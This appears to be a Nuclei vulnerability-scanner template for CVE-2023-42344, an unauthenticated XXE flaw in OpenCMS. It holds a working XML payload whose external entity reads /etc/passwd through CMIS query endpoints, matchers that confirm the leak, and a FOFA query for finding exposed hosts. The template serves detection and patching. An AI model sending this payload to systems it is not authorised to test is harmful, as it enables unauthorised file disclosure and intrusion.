nuclei-templates/http/cves/2023/CVE-2023-42344.yaml

45 lines
2.1 KiB
YAML

id: CVE-2023-42344
info:
name: OpenCMS - XML external entity (XXE)
author: 0xr2r
severity: high
description: |
users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
reference:
- https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
classification:
cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: alkacon
product: opencms
fofa-query: "OpenCms-9.5.3"
tags: cve,cve2023,xxe,opencms
http:
- method: POST
path:
- "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
- "{{BaseURL}}/cmisatom/cmis-online/query"
headers:
Content-Type: "application/xml;charset=UTF-8"
Referer: "{{RootURL}}"
body: |
<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "invalidArgument"
condition: and
# digest: 4b0a00483046022100cd9297a69206851b5a270935eba6b12279fab44f2cd9e9f9727a44a29a1a3719022100c26954d267055f5a683fa9174f4524b95cef451fd0a5a741e7f039e72cb72f15:922c64590222798bb761d5b6d8e72950